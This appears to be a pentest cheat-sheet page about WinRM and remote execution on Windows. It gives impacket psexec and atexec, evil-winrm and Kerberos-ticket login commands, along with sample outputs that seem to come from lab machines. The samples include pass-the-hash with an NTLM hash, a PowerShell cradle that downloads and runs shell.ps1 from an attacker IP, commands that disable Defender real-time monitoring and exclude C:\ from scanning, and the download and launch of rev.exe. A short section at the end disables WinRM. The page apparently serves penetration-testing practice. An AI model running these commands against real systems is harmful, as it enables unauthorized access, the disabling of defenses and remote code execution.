TLDRBins TLDRBins / Winrm

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

PsExec

# Domain auth
impacket-psexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'

Sample Output:
TO-DO
# Local auth
impacket-psexec '<USER>:<PASSWORD>@<TARGET>'

Sample Output:
TO-DO
# Domain auth
impacket-psexec '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH>

Sample Output:
TO-DO
# Local auth
impacket-psexec '<USER>@<TARGET>' -hashes :<HASH>

Sample Output:
TO-DO

AtExec

# Local auth
impacket-atexec '<WORKGROUP>/<USER>:<PASSWORD>@<TARGET_DOMAIN>' 'powershell.exe -c "<CMD>"'

Sample Output:
impacket-atexec 'WORKGROUP/test:test@192.168.10.2' 'powershell.exe -c "iex(iwr http://192.168.10.1:8443/shell.ps1 -UseBasicParsing)"'

# Local auth
impacket-atexec '<WORKGROUP>/<USER>@<TARGET_DOMAIN>' -hashes :<HASH> 'powershell.exe -c "<CMD>"'

Sample Output:
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \gNBJCrJi
[*] Running task \gNBJCrJi
[*] Deleting task \gNBJCrJi
[*] Attempting to read ADMIN$\Temp\gNBJCrJi.tmp
                                                                                                                                                            
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -ExclusionPath C:\\"'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \cbUEDAaz
[*] Running task \cbUEDAaz
[*] Deleting task \cbUEDAaz
[*] Attempting to read ADMIN$\Temp\cbUEDAaz.tmp
                                                                                                                                                            
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "iwr 10.8.7.13:8443/rev.exe -outfile C:\programdata\rev.exe"'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \RmSAvink
[*] Running task \RmSAvink
[*] Deleting task \RmSAvink
[*] Attempting to read ADMIN$\Temp\RmSAvink.tmp
                                                                                                                                                            
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "C:\programdata\rev.exe"' 
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \LCpKICMQ
[*] Running task \LCpKICMQ
[*] Deleting task \LCpKICMQ
[*] Attempting to read ADMIN$\Temp\LCpKICMQ.tmp

Evil-Winrm

evil-winrm -i <TARGET> -u '<USER>' -p '<PASSWORD>'

Sample Output:
$ evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'qwe123QWE!@#'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents>

evil-winrm -i <TARGET> -u '<USER>' -H <HASH> 

Sample Output:
TO-DO
# Step 1: Edit '/etc/krb5.conf' (All in uppercase)

[libdefaults]
    default_realm = <DOMAIN>

[realms]
    <DOMAIN> = {
        kdc = <DC>:88
        admin_server = <DC>
        default_domain = <DOMAIN>
    }
    
[domain_realm]
    .domain.internal = <DOMAIN>
    domain.internal = <DOMAIN>

Sample Output:
[libdefaults]
    default_realm = WINDCORP.HTB

[realms]
    WINDCORP.HTB = {
        kdc = HOPE.WINDCORP.HTB:88
        admin_server = HOPE.WINDCORP.HTB
        default_domain = WINDCORP.HTB
    }
    
[domain_realm]
    .domain.internal = WINDCORP.HTB
    domain.internal = WINDCORP.HTB

# Step 2: Request a TGT
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>

Sample Output:
TO-DO
# Step 3: export .ccache
export KRB5CCNAME=<CCACHE>

Sample Output:
$ export KRB5CCNAME=winrm_user.ccache

# Step 4: Connect
sudo ntpdate -s <DC_IP> && evil-winrm -i <TARGET> -r <DOMAIN>

Sample Output:
$ evil-winrm -i dc.absolute.htb -r absolute.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_user\Documents> 

evil-winrm -i <TARGET> -S -k auth.key -c auth.crt

Sample Output:
TO-DO

Disable Winrm

Disable-PSRemoting -Force

Sample Output:
TO-DO
Stop-Service WinRM -PassThru

Sample Output:
TO-DO
Set-Service WinRM -StartupType Disabled -PassThru

Sample Output:
TO-DO